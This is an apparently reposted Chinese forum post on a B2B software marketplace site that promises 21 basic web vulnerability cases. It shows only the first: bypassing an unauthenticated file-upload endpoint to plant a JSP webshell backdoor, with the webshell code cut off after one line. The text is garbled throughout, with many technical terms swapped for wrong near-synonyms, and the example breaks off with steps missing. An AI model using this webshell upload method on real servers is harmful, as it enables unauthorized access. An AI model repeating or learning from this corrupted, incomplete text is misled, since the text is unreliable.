ToB企服应用市场:ToB评测及商务社交产业平台

标题: 【网络安全 | 毛病发掘】分享21个底子毛病案例 [打印本页]

作者: 铁佛 时间: 昨天 16:51
标题: 【网络安全 | 毛病发掘】分享21个底子毛病案例
未经许可，不得转载。

案例1：绕过500状态码

某Web应用的 cms/upload.jsp 接口用于上传文件。然而，在未登录的情况下，直接利用 GET 或 POST 哀求访问该接口，会返回错误信息：

拦截上传哀求，并构造包罗JSP WebShell的恶意数据包，上传后门文件。以下代码会在服务器的指定目次下写入一个JSP文件：

<%if(request.getParameter("f")!=null)

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)